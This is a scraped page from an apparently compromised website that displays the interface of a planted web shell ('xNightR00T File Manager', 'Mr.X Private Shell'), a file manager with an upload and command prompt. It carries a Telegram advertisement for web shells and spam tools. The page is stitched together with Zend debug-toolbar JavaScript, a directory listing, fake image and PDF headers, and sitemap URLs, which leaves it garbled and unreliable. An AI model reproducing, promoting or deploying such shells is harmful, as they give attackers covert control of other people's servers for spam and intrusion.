xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<div class="zdb-toolbar-entry zdb-studio-integration zdb-align-right zdb-toolbar-button">
    <div class="zdb-toolbar-preview">
        <span class="zdb-toolbar-studio-debug">
            <div class="zdb-toolbar-icon" title="Debug/Profile in IDE"></div>
            <span class="zdb-toolbar-info">&nbsp;</span>
        </span>
    </div>
    <div class="zdb-toolbar-detail zdb-toolbar-detail-redundant"></div>
</div>

<script type="text/javascript">
    (function () {
        var jquery;
        var settings = {};
        var cookies = [];
        var debuggerConfig = <?php echo json_encode($studioConfig) ?>;
        var zendStudioSettingsPollTimer = 0;
        var zendStudioSettingsPollStart = null;
        var jquery = zendDevBar.getJquery();

        var debug = {
            resetIcon: function () {
                return jquery('.zdb-studio-integration .zdb-toolbar-icon')
                        .removeClass('zdb-toolbar-icon-debug-next')
                        .removeClass('zdb-toolbar-icon-debug-post')
                        .removeClass('zdb-toolbar-icon-debug-all');
            },
            changeIcon: function () {
                var $icon = debug.resetIcon();
                if (debug.next.isEnabled()) {
                    $icon.addClass('zdb-toolbar-icon-debug-next');
                } else if (debug.post.isEnabled()) {
                    $icon.addClass('zdb-toolbar-icon-debug-post');
                } else if (debug.all.isEnabled() || debug.allXdebug.isEnabled()) {

                    // var iiii = jquery.cookie('zs-debug-all') && (jquery.cookie('ZendDebuggerCookie') || jquery.cookie('start_debug'));
                    $icon.addClass('zdb-toolbar-icon-debug-all');
                }
            },

            clearAllCookies: function () {
                // clear stud.integ. cookies
                jquery.removeCookie(COOKIE_PREFIX+'zs-debug-post');
                jquery.removeCookie(COOKIE_PREFIX+'zs-debug-all');
                jquery.removeCookie(COOKIE_PREFIX+'xdebug-all');
                jquery.removeCookie(COOKIE_PREFIX+'zs-debug-current');

                zendClearDebugCookies();
            },
            // clear all debug modes
            reset: function () {
                debug.next.disable();
                debug.post.disable();
                debug.all.disable();
            },
            // debug next
            next: {
                flag: false,
                isEnabled: function () {
                    return debug.next.flag;
                },
                enable: function () {
                    loadSettings(function () {
                        debug.reset()
                        debug.next.flag = (zendSetCookies() === true);
                        if (debug.next.flag) {
                            zendDevBar.postMessage('debugnext', cookies);
                        }
                        debug.changeIcon();
                    });
                },
                disable: function () {
                    debug.clearAllCookies();
                    debug.next.flag = false;
                    debug.changeIcon();
                },
            },
            // debug forms (post)
            post: {
                isEnabled: function () {
                    return jquery.cookie('zs-debug-post');
                },
                enable: function () {
                    loadSettings(function () {
                        debug.reset();
                        var setCookieSuccessfully = zendSetCookies('post');
                        if (setCookieSuccessfully) {
                            zendDevBar.postMessage('debugnext', cookies);

                            // set "debug all" cookie
                            jquery.cookie(COOKIE_PREFIX+'zs-debug-post', 1);
                        }

                        debug.changeIcon();
                    });
                },
                disable: function () {
                    debug.clearAllCookies();
                    debug.changeIcon();
                },
            },
            all: {
                isEnabled: function () {
                    //  fixed #ZSRV-16898, not to add message when the all debug pages had a problem and the 'ZendDebuggerCookie' was erased by debugger
                    if (jquery.cookie(COOKIE_PREFIX+'zs-debug-all') && cookies.length == 0 && !(jquery.cookie(COOKIE_PREFIX+'ZendDebuggerCookie'))) {
                        jquery.removeCookie(COOKIE_PREFIX+'zs-debug-all');
                        debug.clearAllCookies();
                    }
                    return jquery.cookie(COOKIE_PREFIX+'zs-debug-all') && (jquery.cookie(COOKIE_PREFIX+'ZendDebuggerCookie') || (cookies.length != 0));
                },
                enable: function () {
                    loadSettings(function () {
                        debug.reset();
                        var setCookieSuccessfully = zendSetCookies('all');
                        if (setCookieSuccessfully) {
                            zendDevBar.postMessage('debugnext', cookies);
                            // set "debug all" cookie
                            jquery.cookie(COOKIE_PREFIX+'zs-debug-all', 1);
                        }

                        debug.changeIcon();
                    });
                },
                disable: function () {
                    debug.clearAllCookies();
                    debug.changeIcon();
                },
            },
            allXdebug: {
                isEnabled: function () {
                    return jquery.cookie(COOKIE_PREFIX+'xdebug-all');
                },
                enable: function () {
                    debug.reset();
                    xdebugAllSetCookies();

                    jquery.cookie(COOKIE_PREFIX+'xdebug-all', 1);

                    debug.changeIcon();
                    zendDevBar.postMessage('debugnext', cookies);
                },
                disable: function () {
                    debug.clearAllCookies()
                    debug.changeIcon();
                },
            }
        };

        if (!debug.all.isEnabled() && !debug.post.isEnabled() && !debug.allXdebug.isEnabled()) {
            zendClearDebugCookies();
        } else {
            debug.changeIcon();
        }

        if (!debuggerConfig.debuggerEnabled && !debuggerConfig.xdebugEnabled) {
            var $icon = debug.resetIcon();
            $icon.addClass('zdb-toolbar-icon-debug-disabled');
            jquery('.zdb-studio-integration .zdb-toolbar-studio-debug .zdb-toolbar-icon').attr("title", "Zend Debugger is disabled");
        }

        (debuggerConfig.debuggerEnabled || debuggerConfig.xdebugEnabled) && jquery('.zdb-studio-integration .zdb-toolbar-studio-debug').qtip({// Grab some elements to apply the tooltip to
            style: {
                classes: 'zendDevBarQtip'
            },
            content: {
                text: function (event, api) {
                    var debugBtn = jquery('<li>Debug current page</li>');
                    debugBtn.click(function (event) {
                        jquery('.zdb-toolbar-studio-debug').qtip('api').hide();
                        loadSettings(function () {
                            if (debuggerConfig.debuggerEnabled) {
                                if (zendSetCookies()) {
                                    zendDevBar.postMessage('debug', cookies);
                                }
                            } else if (debuggerConfig.xdebugEnabled) {
                                xdebugSetCookies();
                            }
                            zendDevBar.postMessage('debug', cookies);
                        });
                    });

                    var delim = jquery('<li class="zdb-delim"></li>');

                    var profileBtn = jquery('<li>Profile current page</li>');
                    profileBtn.click(function (event) {
                        jquery('.zdb-toolbar-studio-debug').qtip('api').hide();
                        loadSettings(function () {
                            settings.isProfiling = true;
                            if (zendSetCookies()) {
                                zendDevBar.postMessage('debug', cookies);
                            }
                        });
                    });

                    var debugNextBtnLabel = debug.next.isEnabled() ? 'Cancel debug next page' : 'Debug next page';
                    var debugNextBtn = jquery('<li>' + debugNextBtnLabel + '</li>');
                    debugNextBtn.click(function (event) {
                        jquery('.zdb-toolbar-studio-debug').qtip('api').hide();

                        if (debug.next.isEnabled()) {
                            debug.next.disable();
                        } else {
                            debug.next.enable();
                        }
                    });

                    var debugPostBtnLabel = debug.post.isEnabled() ? 'Cancel debug all forms (POST)' : 'Debug all forms (POST)';
                    var debugPostBtn = jquery('<li>' + debugPostBtnLabel + '</li>');
                    debugPostBtn.click(function (event) {
                        jquery('.zdb-toolbar-studio-debug').qtip('api').hide();

                        if (debug.post.isEnabled()) {
                            debug.post.disable();
                        } else {
                            debug.post.enable();
                        }
                    });

                    var debugAllBtnLabel = debug.all.isEnabled() ? 'Cancel debug all pages' : 'Debug all pages';
                    var debugAllBtn = jquery('<li>' + debugAllBtnLabel + '</li>');
                    debugAllBtn.click(function (event) {
                        jquery('.zdb-toolbar-studio-debug').qtip('api').hide();

                        if (debug.all.isEnabled()) {
                            debug.all.disable();
                        } else if (debug.allXdebug.isEnabled()) {
                            debug.allXdebug.disable();
                        } else {
                            if (debuggerConfig.xdebugEnabled) {
                                debug.allXdebug.enable();
                            } else {
                                debug.all.enable();
                            }
                        }
                    });

                    var debugButtons = jquery('<div></div>');
                    var debugButtonsList = jquery('<ul></ul>');
                    debugButtonsList.append(debugBtn);
                    if (debuggerConfig.debuggerEnabled) {
                        debugButtonsList.append(delim.clone());
                        debugButtonsList.append(debugNextBtn);
                        debugButtonsList.append(debugPostBtn);
                        debugButtonsList.append(debugAllBtn);
                        debugButtonsList.append(delim.clone());
                        debugButtonsList.append(profileBtn);
                    }
                    debugButtons.append(debugButtonsList);

                    return debugButtons;
                }
            },
            show: {
                event: 'click'
            },
            hide: {
                event: 'click unfocus'
            },
            position: {
                my: 'bottom center',
                at: 'top center',
                effect: false
            },
            events: {
                show: function (event, api) {
                    zendDevBar.postMessage('resize', Math.max(zendDevBar.getHeight(), 185));
                },
                hide: function (event, api) {
                    zendDevBar.postMessage('resize', zendDevBar.getHeight());
                }
            }
        });

        // load IDE settings
        function loadSettings(callback, failureCallback) {
            zendDevBar.loadIdeSettings(function (ideSettings) {
                debuggerConfig.settingsString = ideSettings;
                callback(ideSettings);
            }, function () {
                alert('cannot detect IDE settings');
            });
        }

        // clear all cookies locally and on the main frame
        function zendClearDebugCookies() {
            if (!cookiesEnabled())
                return;

            var cookiesNames = [
                '_bm', 'debug_line_bp', 'debug_file_bp', 'debug_port',
                'send_debug_header', 'debug_host', 'start_debug', 'debug_stop',
                'start_profile', 'debug_coverage', 'send_sess_end', 'debug_jit',
                'debug_start_session', 'original_url', 'ZendDebuggerCookie', 'use_ssl',
                'debug_fastfile', 'debug_protocol', 'debug_session_id', 'no_remote', 'use_remote',
                'zs-debug-current', 'XDEBUG_SESSION'
            ];

            cookies = [];
            for (var i = 0, totalCookies = cookiesNames.length; i < totalCookies; i++) {
                // clear the cookies locally
                jquery.removeCookie(cookiesNames[i]);
                setCookie(cookiesNames[i], '1');
            }
            // clear cookies on the main frame
            zendDevBar.postMessage('cleardebug', cookies);

            cookies = [];
        }

        function xdebugSetCookies() {
            setCookie('XDEBUG_SESSION', 'eclipse');
            /* Add 'zs-debug-current' cookie flag to disable the zray data and show message (debugging mode) */
            var t = new Date();
            t.setSeconds(t.getSeconds() + 3600); // 1 hour
            cookies.push({'key': 'zs-debug-current', 'value': '1', 'options': 'expires=' + t.toGMTString() + ';path=/;'});

            return true;
        }

        function xdebugAllSetCookies() {
            var t = new Date();
            t.setSeconds(t.getSeconds() + 3600); // 1 hour
            cookies.push({'key': 'XDEBUG_SESSION', 'value': 'eclipse', 'options': 'expires=' + t.toGMTString() + ';'});

            return true;
        }

        function zendSetCookies(debugType, skipIdeCheck) {
            if (!debuggerConfig.debuggerEnabled && !debuggerConfig.xdebugEnabled) {
                alert("To start a debugging session, the Debugger needs to be enabled.");
                return false;
            }

            if (!cookiesEnabled()) {
                alert("To use the IDE toolbar, enable cookie support in your browser.");
                return false;
            }

            if (!skipIdeCheck && (!verifyZdeRunning() || !getZdeSettings())) {
                return false;
            }

            if (settings.zendSettingsIP != null && settings.zendSettingsIP != "") {
                setCookie('debug_host', settings.zendSettingsIP);
            }

            if (zendUseSSL()) {
                setCookie('use_ssl', '1');
            }

            if (settings.zendSettingFastFile) {
                setCookie('debug_fastfile', '1');
            }

            setCookie('debug_port', settings.zendSettingsPort);
            setCookie('start_debug', '1');
            setCookie('send_debug_header', '1');
            setCookie('send_sess_end', '1');
            setCookie('debug_jit', '1');
            setCookie('debug_fastfile', '1');

            if (typeof settings.isProfiling != 'undefined' && settings.isProfiling) {
                setCookie('start_profile', '1');
                setCookie('debug_coverage', '1');
            } else {
                if (zendGetZDEFirstLine()) {
                    setCookie('debug_stop', '1');
                }
                if (zendUseLocalCopyIfAvailable()) {
                    setCookie('use_remote', '1');
                } else {
                    setCookie('no_remote', '1');
                }
            }

            if (settings.zendSettingProtocol != null) {
                setCookie('debug_protocol', settings.zendSettingProtocol);
            }

            setCookie('debug_session_id', (Math.floor(Math.random() * 147483648) + 2000));

            if (debugType && debugType.toLowerCase() == 'all') {
                setCookie('debug_start_session', '1');
            } else if (debugType && debugType.toLowerCase() == 'post') {
                setCookie('debug_start_session', 'POST');
            }

            return true;
        }

        function setCookie(key, value) {
            var t = new Date();
            t.setSeconds(t.getSeconds() + 2);
            cookies.push({'key': key, 'value': value, 'options': 'expires=' + t.toGMTString() + ';'});
        }

        function zendGetZDEFirstLine() {
            return (zendDevBar.ideSettings && parseInt(zendDevBar.ideSettings.studioBreakOnFirstLine));
        }

        function zendUseLocalCopyIfAvailable() {
            return (zendDevBar.ideSettings && parseInt(zendDevBar.ideSettings.studioUseRemote));
        }

        function zendUseSSL() {
            return (zendDevBar.ideSettings && parseInt(zendDevBar.ideSettings.studioUseSsl));
        }

        function cookiesEnabled() {
            document.cookie = '__test__cookie__=1'
            if (document.cookie.indexOf('__test__cookie__') != -1) {
                document.cookie = "__test__cookie__=; expires=Thu, 01 Jan 1970 00:00:01 GMT;";
                return true;
            } else {
                return false;
            }
        }

        function getZdeSettingString() {
            var settingsString = debuggerConfig.settingsString;
            return (settingsString == '') ? false : settingsString;
        }

        function verifyZdeRunning() {
            if (!getZdeSettingString()) {
                alert('Cannot detect running IDE.');
                return false;
            }

            return true;
        }

        function getZdeSettings() {
            try {
                var settingsString = getZdeSettingString();
                if (!settingsString) {
                    alert("Cannot auto detect IDE settings at port: 20080.\n\n" +
                            "Make sure that IDE is running on this computer\n" +
                            "and is configured to work on this port. If you have an older version,\n" +
                            "use the settings dialog to disable auto detection and manually configure\n" +
                            "the IDE settings.");
                    return false;
                } else {
                    var ZDE_IP = null;
                    var ZDE_Port = "10000";
                    var ZDE_UseSSL = false;
                    var ZDE_FastFile = false;
                    var ZDE_Protocol = null;
                    var settingsArray = settingsString;
                    var i;

                    $zendDevBar.each(settingsArray, function (key, item) {
                        if (key == "debug_port")
                            ZDE_Port = item;
                        else if (key == "debug_host")
                            ZDE_IP = item;
                        else if (key == "use_ssl")
                            ZDE_UseSSL = item;
                        else if (key == "debug_fastfile")
                            ZDE_FastFile = item;
                        else if (key == "debug_protocol")
                            ZDE_Protocol = item;
                    });

                    if (ZDE_IP == null)
                        return false;

                    settings.zendSettingsPort = ZDE_Port;
                    settings.zendSettingsUseSSL = ZDE_UseSSL;

                    // replace 127.0.0.1 order to be last in case it exists
                    if (ZDE_IP.indexOf('127.0.0.1') > -1) {
                        var exploded = ZDE_IP.split(',');
                        var localIndex = exploded.indexOf('127.0.0.1');
                        if (localIndex > -1) {
                            exploded.splice(localIndex, 1);
                        }
                        exploded.push('127.0.0.1');
                        ZDE_IP = exploded.join(',');
                    }
                    settings.zendSettingsIP = ZDE_IP.replace("%2C", ",");
                    settings.zendSettingFastFile = ZDE_FastFile;
                    settings.zendSettingProtocol = ZDE_Protocol;

                    return true;
                }

            } catch (e) {
                alert(e);
            }
        }

    })();
</script>

Filemanager

Name Type Size Permission Actions
controls.phtml File 685 B 0644
default-tables.phtml File 22.21 KB 0644
events.phtml File 18.4 KB 0644
function-stats.phtml File 17.79 KB 0644
loading-custom.phtml File 1.25 KB 0644
log-entries.phtml File 30.61 KB 0644
message.phtml File 329 B 0644
notifications.phtml File 6.14 KB 0644
queries.phtml File 42.27 KB 0644
request-info.phtml File 39.39 KB 0644
run-time.phtml File 14.34 KB 0644
secure.phtml File 3.03 KB 0644
server-info.phtml File 18.09 KB 0644
studio-integration.phtml File 19.88 KB 0644
superglobals.phtml File 48.57 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml